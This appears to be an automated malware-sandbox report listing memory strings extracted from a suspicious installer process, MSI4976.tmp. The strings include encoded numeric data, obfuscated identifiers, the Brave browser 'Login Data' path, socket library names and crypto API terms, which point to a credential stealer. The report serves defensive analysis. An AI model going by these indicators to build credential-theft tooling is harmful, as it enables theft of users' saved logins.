              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302006l227301941l227301946l227301945l227301925l227301939l227301938l
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301891l227301944l227301943l227301940l227301946l227301939l227302006l227301922l227301945l227302006l227301923l227301925l227301939l227302006l227301922l227301950l227301939l227302006l227301906l227301914l227301914l227302006l227301936l227301951l227301946l227301939l227302008h
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301908l227301943l227301938l227302006l227301944l227301923l227301947l227301940l227301939l227301924l227302006l227301945l227301936l227302006l227301926l227301943l227301924l227301943l227301947l227301939l227301922l227301939l227301924l227301925l227302008227302
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: c:\users\user\appdata\local\bravesoftware\brave-browser\user data\default\login datap
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301904l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227302006l227301944l227301945l227301922l227302006l227301936l227301945l227301923l227301944l227301938l227302006l227301951l227301944l227302006l227301922l227301950l227301939l227302006l227301906l227301914l227301914l227302006l227301936l227301951l227301946l227301939l227302008d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301891l227301944l227301924l227301939l227301941l227301945l227301937l227301944l227301951l227301932l227301939l227301938l227302006l227301939l227301924l227301924l227301945l227301924l227302008l227302006l227302006l227301910l227301939l227301924l227301924l227301945l227301924l227302006l227301995l227302006h
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301891l227301944l227301943l227301940l227301946l227301939l227302006l227301922l227301945l227302006l227301945l227301926l227301939l227301944l227302006l227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946h
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301890l227301950l227301939l227302006l227301945l227301940l227301948l227301939l227301941l227301922l227302006l227301921l227301943l227301925l227302006l227301944l227301945l227301922l227302006l227301936l227301945l227301923l227301944l227301938l227302008227302
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 01945l227301926l227301939l227301944l227301939l227301938x
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227302011l227302006l227301908l227301941l227301924l227301935l227301926l227301922l227302008l227301938l227301946l227301946l227302006l227301925l227301923l227301941l227301941l227301939l227301925l227301925l227301936l227301923l227301946l227301946l227301935l227302006l227301945l227301926l227301939l227301944l227301939l227301938b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301890l227301950l227301939l227302006l227301924l227301939l227301927l227301923l227301939l227301925l227301922l227302006l227301951l227301925l227302006l227301944l227301945l227301922l227302006l227301925l227301923l227301926l227301926l227301945l227301924l227301922l227301939l227301938l227302008227301-
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 227301904l227301923l227301944l227301941l227301922l227301951l227301945l227301944l227301996l227302006l227301897l227301897l227301909l227301924l227301935l227301926l227301922l227301945l227301912l227301905l227301897l227301919l227301925l227301911l227301923l227301922l227301950l227301890l227301943l227301937l227301908l227301951l227301922l227301914l227301939l227301944l227301937l227301922l227301950l227301888l227301943l227301946l227301951l227301938l227302014l227302015
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 12fy
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f1ro5tz1p5my8jc3h5zr7oy3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e5dp0eh4hg1m1bt9lw3i`3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f1ro5tz1p9ht7kd6xi7dk3(x#
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f1ro5tz1p7hf7od5z5t7or3#x$
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: f1ro5tz1p5hb2ta0k6gu3:x%
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: q9ez4cx3r2pa9en3a3i|3=x&
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: e2qg3kt9n0ci4az8q8g
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: q9ez4cx3r8wu0wb7mj5x
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: __sqlite_consolewrite
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: l9at8bn1p6np8eb3sc5f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m4kt0iy6m#3memstr_713a0836-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5uw8dj3c*3kx,memstr_54d7c105-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6lb6yf1n8v-3bx-memstr_2d360f03-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m1bt9lw3i43ex.memstr_d90e0e00-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b2cy9kd5e+memstr_25d99e99-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p3oi9ui3mk7tmemstr_71165750-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m1bt9lw3imemstr_7ec8612a-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1at9xx4lmemstr_e08e838a-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: proxyclient_start5tmemstr_3b4330f5-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p2zr8dc1vp8xmemstr_73501ecd-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: function: y5tv9un9j()memstr_f6aaa62b-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p5ih3zq8ei8cmemstr_6f45b59e-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\installermemstr_4e82578f-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dzqknadnup2ke3ig9pv8vmemstr_276f2153-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9zk9nn7xh8gmemstr_39d9febe-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g3wp1ah7cy5xmemstr_c519b5f3-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: des_112-ad66-4c7c-9a1@lmemstr_0bb26a6b-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b7zo6od4sklmemstr_004cfd4a-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e7dz3cb8irlmemstr_daeb14c0-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1xt0kv5xulmemstr_63be3238-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocklengthh;byte for\lmemstr_b8dc4e19-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2be1nc2uglmemstr_b6b60205-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: blocksizelistnl/[hmemstr_44665349-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodecbcql&[imemstr_c77c3538-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodecfb;long txl9[jmemstr_033a740f-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1er6rp3gx3imemstr_c4058e1d-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n0ug5lm5wmemstr_c89511d1-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodegcmu6li8ymemstr_57c409aa-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1ik5ah0rw9smemstr_624974b8-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dsaparametershort data&lmemstr_22fc1c1e-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: effectivekeylength)ln[qmemstr_706b395a-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: authtaglength0la[rmemstr_f4298205-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashblocklengththrw9s;lx[smemstr_e867cf35-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p0lw5at1rm6amemstr_b317cd51-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodeccmmemstr_c07762d0-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmodeecb52d-9cdmemstr_b0665f7a-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmoden/amemstr_060cd258-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p8pp8ir2zp7imemstr_1b082406-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m2sz5ny4ji5nmemstr_29ee8aea-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: chainingmode-44ee-8ebmemstr_e3d1909f-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e5au3zc6li8ymemstr_1c6c92ab-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9en5oh1hd2pmemstr_e1bcfffa-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dhparameters/amemstr_2fcc6fd2-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b4iq9rt1imemstr_67c1c1f0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b3cw2ka3om5umemstr_b7c9657e-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: n4ig4rn1rz4fnl1bw1wr8fmemstr_25b54667-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8bk4fh8lmemstr_2782f02f-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.1.1.1memstr_df0ae5e5-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r6fo9tl5io0omemstr_959cbd57-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: paddingschemesmemstr_f3a73792-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p0da2gt1vr5i5ymemstr_1566fe06-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r7nh0so6mmemstr_23cf23ce-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashdigestlengthgmmemstr_449e15fb-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: hashoidlistngthnmmemstr_5a4c0fb6-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: multiobjectlengthmemstr_b14e653c-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p6xv7fb1xxmmemstr_d9dc1050-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2rn5bg2fcmmemstr_0d3326fe-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.2memstr_f1fb937d-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.2jm+zlmemstr_230e370c-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keyobjectlengthmm"zmmemstr_83c413cb-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: objectlengthngthtm%znmemstr_fe1fb6ec-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ivhoidlistmemstr_a5e1f45a-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: signaturelengthmemstr_36013538-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keystrengthgthmemstr_06a8824b-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p9nx7mp1qi0dmemstr_ed15d38c-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: messageblocklength"mmemstr_357dfd41-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b1zf1ly0pro%mjzumemstr_8c663227-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.7memstr_5e604cd2-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.7,mmzvmemstr_40f78c81-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.4memstr_b273f178-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <w1.2.840.113549.3.47mdzwmemstr_2bd09f64-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p6um5xu5b>mmemstr_3bca5b98-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: keylengthsmemstr_9a9ef538-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0gi4kn5no9cmemstr_bde83e14-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o6qr5jz0je5ymemstr_6b1c3406-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m4bj7sj5kw2ymemstr_d9a1f4dc-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g4zb9jw9lmemstr_261c27f9-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r2qe4ez1qx7nmemstr_5b4286e8-1
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5ic4cs7hm8xmemstr_1a8d4c2a-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p4fx2uw4vmemstr_628e176c-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m3dd0gb0smemstr_33f8b327-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: int tv_sec;int tv_usecmemstr_5bec7564-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fd_arraymemstr_5c72391d-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9bv5pl0fn4omemstr_d2ac80c8-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5fu2fk5je4smemstr_10bac416-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g6ki3tt6vmemstr_337e543f-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e8du3sr9gt9qmemstr_13ebfe78-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: long length;ptr pbdatamemstr_3c76eb12-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: p2oo1bl2ku5e3ow0va7omemstr_b55d1ff3-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p9pp4ck1ho0kcnmemstr_2f528baf-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9kh8nt0vjnmemstr_369992d7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p2bl1vk1qmnmemstr_717c0b5c-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e2qg3kt9n7it7cl2ea3xfttnmemstr_562fd02d-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __wsafdissetmemstr_37375dd7-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \windatafnmemstr_cce92ceb-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fd_countocal\bravesofin.]memstr_3016ee3f-8
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b9nz5or8lmemstr_43a4b844-e
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m0uy7nm6omemstr_fe61199d-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m6jr9mp3po3vmemstr_d2003848-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o1zk1ck5py8lmemstr_deaa5b7b-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g9oj8dy3etmemstr_832ee4a5-f
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0dq2od8ra7u!nmemstr_23ea0979-0
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p5vg0vy8e(ni]memstr_c7ced69e-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b8hw6xb6j:n{]memstr_056fc2eb-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p4hc9xr3bb8p=nr]memstr_38c5f135-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g0pr3vq7wmemstr_7db0ec9c-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p5vn8bh9re9tmemstr_fa4fd915-d
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b7ns2it6t\cmemstr_d67234f3-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: o6xu0ep0p9eh1tt1smemstr_0ae6c965-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o2xb0rg9tg3mmemstr_a152ef86-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: s9ye6vh0ai3g6wb4ua9yj3umemstr_3e53d0fc-9
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: e5dp0eh4hg1m7da4uw2mw6mmemstr_e5e8dbbc-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p4nd7eh0xmemstr_562ef504-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b6pq2cg7ez9xmemstr_881b5bf0-c
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: m2vd2wl8nv4o8jf7py6io3kmemstr_82cf5e08-5
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p2lo0os0kmemstr_73a9fb48-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: l9at8bn1p3ai1lo6lmemstr_505e593b-7
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dword;ptr;ptr;memstr_ce737f6d-4
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b4dr9dc6ar8hmemstr_aea134d0-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: a9oh6cy4tz5p0ip9jn5zmemstr_98f462fd-6
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ws2_32.dllmemstr_0b8c3206-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p5hp7rk7bb7dskmemstr_0f1bc7b4-b
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f1ro5tz1p1mn5cq9b0kmemstr_c7acdcad-3
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f7bp2gd7nmp6eb1om3zfomemstr_1a0e9e2e-a
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f2kn6pg2ic8b2tr4ar3nmemstr_c0328d25-2
              Source: MSI4976.tmp, 00000003.00000002.2616680116.0000000004A60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: q9ez4cx3r6gc8yw6qmemstr_b0f3be3e-c
